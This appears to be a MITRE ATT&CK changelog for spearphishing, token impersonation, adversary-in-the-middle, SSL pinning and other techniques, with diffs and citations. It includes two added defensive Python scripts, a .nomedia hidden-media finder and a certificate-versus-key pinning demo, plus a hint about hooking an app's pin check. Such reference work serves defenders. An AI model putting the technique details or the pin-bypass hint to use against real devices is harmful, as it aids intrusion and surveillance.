external_references |  | {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}

[T1648] Serverless Execution

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-24 15:21:55.001000+00:00 | 2024-03-05 16:13:38.643000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
iterable_item_added
STIX Field | Old value | New value
x_mitre_contributors |  | Vectra AI

[T1566.001] Phishing: Spearphishing Attachment

Current version: 2.2


Old Description:
Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

New Description:
Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.(Citation: Unit 42 DarkHydrus July 2018) Spearphishing may also involve social engineering techniques, such as posing as a trusted source. There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New value
modified | 2023-03-30 21:01:42.995000+00:00 | 2024-01-31 14:09:27.066000+00:00
description | Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. | Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. 
In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.(Citation: Unit 42 DarkHydrus July 2018) Spearphishing may also involve social engineering techniques, such as posing as a trusted source. There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
x_mitre_attack_spec_version3.1.03.2.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Unit 42 DarkHydrus July 2018', 'description': 'Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.', 'url': 'https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/'}

[T1566.003] Phishing: Spearphishing via Service

Current version: 2.0


Old Description
Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.

A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.

New Description
Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: Lookout Dark Caracal Jan 2018) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.

A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.

Details
dictionary_item_added
- x_mitre_deprecated: False
values_changed
- modified: 2023-03-30 21:01:50.401000+00:00 → 2024-01-31 14:15:55.690000+00:00
- description: see the Old/New text above (the only change is the added citation)
- x_mitre_attack_spec_version: 3.1.0 → 3.2.0
iterable_item_added
- external_references: {'source_name': 'Lookout Dark Caracal Jan 2018', 'description': 'Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.', 'url': 'https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf'}

[T1134.001] Access Token Manipulation: Token Impersonation/Theft

Current version: 1.2


Old Description
Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`. The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.

An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.

When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.

New Description
Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function) The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.

An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.

When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.

Details
values_changed
- modified: 2023-09-29 21:08:45.174000+00:00 → 2024-01-10 17:57:36.177000+00:00
- description: see the Old/New text above (the only change is the added citation)
iterable_item_added
- external_references: {'source_name': 'DuplicateToken function', 'description': 'Microsoft. (2021, October 12). DuplicateToken function (securitybaseapi.h). Retrieved January 8, 2024.', 'url': 'https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-duplicatetoken'}

[T1552] Unsecured Credentials

Current version: 1.3


Old Description
Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).

New Description
Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).(Citation: Brining MimiKatz to Unix)

Details
values_changed
- modified: 2023-04-13 00:29:53.605000+00:00 → 2024-04-15 21:33:12.892000+00:00
- description: see the Old/New text above (the only change is the added citation)
- x_mitre_attack_spec_version: 3.1.0 → 3.2.0
iterable_item_added
- external_references: {'source_name': 'Brining MimiKatz to Unix', 'description': 'Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.', 'url': 'https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf'}

[T1535] Unused/Unsupported Cloud Regions

Current version: 1.1

Details
dictionary_item_added
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_deprecated: False
dictionary_item_removed
- x_mitre_permissions_required: ['User']
values_changed
- modified: 2021-04-22 16:46:43.876000+00:00 → 2023-12-14 16:28:24.680000+00:00
- external_references[1]['url']: https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc → https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc

[T1583.006] Acquire Infrastructure: Web Services

Current version: 1.2


Old Description
Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.

New Description
Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: FireEye APT29) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.

Details
values_changed
- modified: 2023-04-12 20:19:07.916000+00:00 → 2024-01-16 22:47:59.395000+00:00
- description: see the Old/New text above (the only change is the added citation)
- x_mitre_attack_spec_version: 3.1.0 → 3.2.0
iterable_item_added
- external_references: {'source_name': 'FireEye APT29', 'description': 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.', 'url': 'https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf'}

mobile-attack

New Techniques

[T1628.003] Hide Artifacts: Conceal Multimedia Files

Current version: 1.0

Description: Adversaries may attempt to hide multimedia files from the user. By doing so, adversaries may conceal captured files, such as pictures, videos and/or screenshots, then later exfiltrate those files. Specific to Android devices, if the `.nomedia` file is present in a folder, multimedia files in that folder will not be visible to the user in the Gallery application. Additionally, other applications are asked not to scan the folder with the `.nomedia` file, effectively making the folder appear invisible to the user. This technique is often used by stalkerware and spyware applications.
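A forensic check for the `.nomedia` behavior described above, added here as an example (it is not part of the ATT&CK page or of MITRE's tooling): given a copy of the device storage, for instance one pulled with `adb pull /sdcard`, it reports every directory carrying a `.nomedia` marker together with the media files that marker hides from the Gallery. The sample tree, including the package name `com.example.sync`, is constructed by the script itself.

```python
"""Report media hidden from the Android Gallery by .nomedia markers.

Added example, not MITRE's code. Run it against a pulled copy of device
storage; the sample tree (hypothetical package com.example.sync) is CONSTRUCTED
here so the script runs offline.
"""
import os
import tempfile

# Extensions Android's media scanner would normally index.
MEDIA_EXT = {".jpg", ".jpeg", ".png", ".gif", ".webp", ".mp4", ".3gp", ".mkv",
             ".webm", ".mp3", ".m4a", ".aac", ".ogg", ".wav"}


def find_hidden_media(root):
    """Return {marker_dir: [hidden media paths]} for each directory under root
    holding a .nomedia file.  MediaScanner checks every ancestor directory for
    .nomedia, so files in subdirectories of a marked folder are hidden too and
    are reported under the nearest marked ancestor."""
    hidden = {}
    for dirpath, dirnames, filenames in os.walk(root):
        if ".nomedia" not in filenames:
            continue
        media = []
        for sub, _, names in os.walk(dirpath):            # whole marked subtree
            media.extend(os.path.join(sub, n) for n in names
                         if os.path.splitext(n)[1].lower() in MEDIA_EXT)
        hidden[dirpath] = sorted(media)
        dirnames[:] = []        # subtree already covered; do not report nested markers twice
    return hidden


def build_sample_tree():
    """Constructed sample: a normal camera folder plus a stalkerware-style
    hidden cache with a .nomedia marker and a nested recordings folder."""
    root = tempfile.mkdtemp(prefix="sdcard_")
    camera = os.path.join(root, "DCIM", "Camera")
    cache = os.path.join(root, "Android", "data", "com.example.sync", ".cache")
    nested = os.path.join(cache, "2024")
    for d in (camera, nested):
        os.makedirs(d)
    for path in (os.path.join(camera, "IMG_0001.jpg"),   # visible, must not be reported
                 os.path.join(cache, ".nomedia"),
                 os.path.join(cache, "scr_001.png"),      # hidden screenshot
                 os.path.join(nested, "rec_001.mp4"),     # hidden recording in subfolder
                 os.path.join(nested, "index.db")):       # not media, ignored
        with open(path, "wb") as f:
            f.write(b"\x00")
    return root


if __name__ == "__main__":
    for marker, files in find_hidden_media(build_sample_tree()).items():
        print(marker)
        for f in files:
            print("   ", f)
```

On a real image, point `find_hidden_media` at the pulled root; directories under `Android/data/<package>/` with a marker and recent timestamps are the ones worth pulling for review, and the marker's package path identifies the app to look at next.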


[T1664] Exploitation for Initial Access

Current version: 1.0

Description: Adversaries may exploit software vulnerabilities to gain initial access to a mobile device. This can be accomplished in a variety of ways. Vulnerabilities may be present in applications, services, the underlying operating system, or in the kernel itself. Several well-known mobile device exploits exist, including FORCEDENTRY, StageFright, and BlueBorne. Further, some exploits may be possible to exploit without any user interaction (zero-click), making them particularly dangerous. Mobile operating system vendors are typically very quick to patch such critical bugs, ensuring only a small window where they can be exploited.


[T1422.001] System Network Configuration Discovery: Internet Connection Discovery

Current version: 1.0

Description: Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using `adb shell netstat` for Android.(Citation: adb_commands) Adversaries may use the results and responses from these requests to determine if the mobile devices are capable of communicating with adversary-owned C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.


[T1521.003] Encrypted Channel: SSL Pinning

Current version: 1.0

Description: Adversaries may use [SSL Pinning](https://attack.mitre.org/techniques/T1521/003) to protect the C2 traffic from being intercepted and analyzed. [SSL Pinning](https://attack.mitre.org/techniques/T1521/003) is a technique commonly utilized by legitimate websites to ensure that encrypted communications are only allowed with a pre-defined certificate. If another certificate is presented, it could indicate device compromise, traffic interception, or another upstream issue. While benign usages are common, it is also possible for adversaries to abuse this technology to protect malicious C2 traffic.

In normal, not pinned SSL validation, when a client connects to a server using HTTPS, it typically checks whether the server’s SSL/TLS certificate is signed by a trusted Certificate Authority (CA) in the device’s trust store. If the certificate is valid and signed by a trusted CA, the connection is established. However, with [SSL Pinning](https://attack.mitre.org/techniques/T1521/003), the client is configured to trust a specific SSL/TLS certificate or public key, rather than relying on the device’s trust store. This means that even if the server’s certificate is signed by a trusted CA, the client will only establish the connection of the certificate or key is pinned.

There are two types of [SSL Pinning](https://attack.mitre.org/techniques/T1521/003):

1. Certificate Pinning: The client stores a copy of the server’s certificate and compares it with the certificate received during the SSL handshake. If the certificates match, then the client proceeds with the connection. This approach also works with self-signed certificates.
2. Public Key Pinning: Instead of pinning the entire certificate, the client pins just the public key extracted from the certificate. This is often more flexible, as it allows the server to renew its certificate without having to update the pinned certificate or breaking the SSL connection.
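The two pinning modes described above, as an added example that is not part of the ATT&CK page or of MITRE's tooling: a minimal DER walker pulls the SubjectPublicKeyInfo out of an X.509 certificate and derives the base64(SHA-256(SPKI)) pin that HPKP and Android's Network Security Configuration use, then a certificate pin and a key pin are each checked against a renewed certificate. Both certificates are constructed in the script (structurally valid DER with a dummy key and signature, hypothetical subject `c2.example`) so it runs offline; `extract_spki` and `spki_pin` work unchanged on a real DER certificate, e.g. the output of `ssl.get_server_certificate` passed through `ssl.PEM_cert_to_DER_cert`.

```python
"""Certificate pinning vs. public-key (SPKI) pinning, shown on a renewal.

Added example, not MITRE's code.  The certificates are CONSTRUCTED here
(valid DER structure, dummy key and signature, subject "c2.example").
"""
import base64
import hashlib


def _read_tlv(buf, pos=0):
    """Decode one DER TLV at buf[pos]; return (tag, value, end_offset)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _children(value):
    """Split a constructed value into its child TLVs (raw bytes, tag included)."""
    out, pos = [], 0
    while pos < len(value):
        start = pos
        _, _, pos = _read_tlv(value, pos)
        out.append(value[start:pos])
    return out


def extract_spki(cert_der):
    """Return the raw SubjectPublicKeyInfo TLV of a DER-encoded X.509 certificate."""
    tag, cert, _ = _read_tlv(cert_der)
    if tag != 0x30:
        raise ValueError("certificate is not a SEQUENCE")
    tbs_tag, tbs, _ = _read_tlv(cert)            # tbsCertificate is the first element
    if tbs_tag != 0x30:
        raise ValueError("tbsCertificate is not a SEQUENCE")
    fields = _children(tbs)
    if fields[0][0] == 0xA0:                     # optional EXPLICIT [0] version
        fields = fields[1:]
    # serialNumber, signature, issuer, validity, subject, subjectPublicKeyInfo, ...
    return fields[5]


def spki_pin(cert_der):
    """Public-key pin (HPKP / Android NSC <pin digest="SHA-256">): base64(SHA-256(SPKI))."""
    return base64.b64encode(hashlib.sha256(extract_spki(cert_der)).digest()).decode()


def cert_pin(cert_der):
    """Certificate pin: hash of the whole certificate, so any re-issue changes it."""
    return hashlib.sha256(cert_der).hexdigest()


def check_cert_pinning(cert_der, pinned_cert_hash):
    return cert_pin(cert_der) == pinned_cert_hash


def check_key_pinning(cert_der, pinned_spki_pins):
    return spki_pin(cert_der) in pinned_spki_pins


# --- constructed test certificates -------------------------------------------
def _der(tag, content):
    """Encode one DER TLV, using the long length form when needed."""
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + content


def _seq(*parts):
    return _der(0x30, b"".join(parts))


def make_cert(serial, not_before, not_after, spki):
    """Structurally valid X.509 v3 DER with the given SPKI and a dummy signature."""
    sha256_rsa = _seq(_der(0x06, bytes.fromhex("2A864886F70D01010B")), _der(0x05, b""))
    name = _seq(_der(0x31, _seq(_der(0x06, bytes.fromhex("550403")), _der(0x0C, b"c2.example"))))
    validity = _seq(_der(0x17, not_before), _der(0x17, not_after))
    tbs = _seq(_der(0xA0, _der(0x02, b"\x02")),               # version v3
               _der(0x02, serial), sha256_rsa, name, validity, name, spki)
    return _seq(tbs, sha256_rsa, _der(0x03, b"\x00" * 33))     # dummy signature


# One (dummy rsaEncryption) key pair reused across a certificate renewal.
SPKI = _seq(_seq(_der(0x06, bytes.fromhex("2A864886F70D010101")), _der(0x05, b"")),
            _der(0x03, b"\x00" + bytes(range(1, 65))))
CERT_2023 = make_cert(b"\x01", b"230101000000Z", b"240101000000Z", SPKI)
CERT_2024 = make_cert(b"\x02", b"240101000000Z", b"250101000000Z", SPKI)   # renewed, same key


def renewal_outcomes():
    """Pin on the 2023 certificate, then present the renewed 2024 certificate."""
    pinned_cert = cert_pin(CERT_2023)
    pinned_keys = {spki_pin(CERT_2023)}
    return {
        "cert_pinning_accepts_renewed": check_cert_pinning(CERT_2024, pinned_cert),  # False
        "key_pinning_accepts_renewed": check_key_pinning(CERT_2024, pinned_keys),    # True
    }


if __name__ == "__main__":
    print(renewal_outcomes())
```

For the analyst the practical consequence is the one the description states: a pinned client ignores the device trust store, so installing an interception proxy's CA certificate on the device does not open the malware's C2 channel; the pin check inside the app has to be located and patched or hooked instead. The same SPKI pin computed here is what you would expect to find hard-coded in such an app.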


[T1422.002] System Network Configuration Discovery: Wi-Fi Discovery

Current version: 1.0

Description: Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Discovery](https://attack.mitre.org/tactics/TA0032) or [Credential Access](https://attack.mitre.org/tactics/TA0031) activity to support both ongoing and future campaigns.

Minor Version Changes

[T1638] Adversary-in-the-Middle

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
New Description
t1Adversaries may attempt to position themselves between two ot1Adversaries may attempt to position themselves between two o
>r more networked devices to support follow-on behaviors such>r more networked devices to support follow-on behaviors such
> as [Transmitted Data Manipulation](https://attack.mitre.org> as [Transmitted Data Manipulation](https://attack.mitre.org
>/techniques/T1565/002) or [Endpoint Denial of Service](https>/techniques/T1565/002) or [Endpoint Denial of Service](https
>://attack.mitre.org/techniques/T1642).       [Adversary-in-t>://attack.mitre.org/techniques/T1642).       [Adversary-in-t
Old Description
Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic.

Outside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning.

If applications properly encrypt their network traffic, sensitive data may not be accessible an adversary, depending on the point of capture.

New Description
Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms. For example, a malicious application may register itself as a VPN client, effectively redirecting device traffic to adversary-owned resources. Registering as a VPN client requires user consent on both Android and iOS; additionally, a special entitlement granted by Apple is needed for iOS devices. Alternatively, a malicious application with escalation privileges may utilize those privileges to gain access to network traffic.

Specific to Android devices, adversary-in-the-disk is a type of AiTM attack where adversaries monitor and manipulate data that is exchanged between applications and external storage.(Citation: mitd_kaspersky)(Citation: mitd_checkpoint)(Citation: mitd_checkpoint_research) To accomplish this, a malicious application firsts requests for access to multimedia files on the device (`READ_EXTERNAL STORAGE` and `WRITE_EXTERNAL_STORAGE`), then the application reads data on the device and/or writes malware to the device. Though the request for access is common, when used maliciously, adversaries may access files and other sensitive data due to abusing the permission. Multiple applications were shown to be vulnerable against this attack; however, scrutiny of permissions and input validations may mitigate this attack.

Outside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as [ARP Cache Poisoning](https://attack.mitre.org/techniques/T1557/002) or [DHCP Spoofing](https://attack.mitre.org/techniques/T1557/003).

If applications properly encrypt their network traffic, sensitive data may not be accessible to adversaries, depending on the point of capture. For example, properly implementing Apple’s Application Transport Security (ATS) and Android’s Network Security Configuration (NSC) may prevent sensitive data leaks.(Citation: NSC_Android)
Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-15 16:39:32.207000+00:00 | 2024-02-07 18:10:46.887000+00:00
description | Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic. Outside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning. If applications properly encrypt their network traffic, sensitive data may not be accessible an adversary, depending on the point of capture. | Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms. For example, a malicious application may register itself as a VPN client, effectively redirecting device traffic to adversary-owned resources. Registering as a VPN client requires user consent on both Android and iOS; additionally, a special entitlement granted by Apple is needed for iOS devices. Alternatively, a malicious application with escalation privileges may utilize those privileges to gain access to network traffic. Specific to Android devices, adversary-in-the-disk is a type of AiTM attack where adversaries monitor and manipulate data that is exchanged between applications and external storage.(Citation: mitd_kaspersky)(Citation: mitd_checkpoint)(Citation: mitd_checkpoint_research) To accomplish this, a malicious application firsts requests for access to multimedia files on the device (`READ_EXTERNAL STORAGE` and `WRITE_EXTERNAL_STORAGE`), then the application reads data on the device and/or writes malware to the device. Though the request for access is common, when used maliciously, adversaries may access files and other sensitive data due to abusing the permission. Multiple applications were shown to be vulnerable against this attack; however, scrutiny of permissions and input validations may mitigate this attack. Outside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as [ARP Cache Poisoning](https://attack.mitre.org/techniques/T1557/002) or [DHCP Spoofing](https://attack.mitre.org/techniques/T1557/003). If applications properly encrypt their network traffic, sensitive data may not be accessible to adversaries, depending on the point of capture. For example, properly implementing Apple’s Application Transport Security (ATS) and Android’s Network Security Configuration (NSC) may prevent sensitive data leaks.(Citation: NSC_Android)
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 2.1 | 2.2
iterable_item_added
STIX Field | Old value | New value
external_references |  | {'source_name': 'mitd_checkpoint', 'description': 'Check Point Research Team. (2018, August 12). Man-in-the-Disk: A New Attack Surface for Android Apps. Retrieved October 31, 2023.', 'url': 'https://blog.checkpoint.com/security/man-in-the-disk-a-new-attack-surface-for-android-apps/'}
external_references |  | {'source_name': 'mitd_kaspersky', 'description': 'Drozhzhin, A. (2018, August 27). Man-in-the-Disk: A new and dangerous way to hack Android. Retrieved October 31, 2023.', 'url': 'https://usa.kaspersky.com/blog/man-in-the-disk/16089/'}
external_references |  | {'source_name': 'NSC_Android', 'description': 'Lee, A., Ramirez, T. (2018, August 15). A Security Analyst’s Guide to Network Security Configuration in Android P. Retrieved February 7, 2024.', 'url': 'https://www.nowsecure.com/blog/2018/08/15/a-security-analysts-guide-to-network-security-configuration-in-android-p/'}
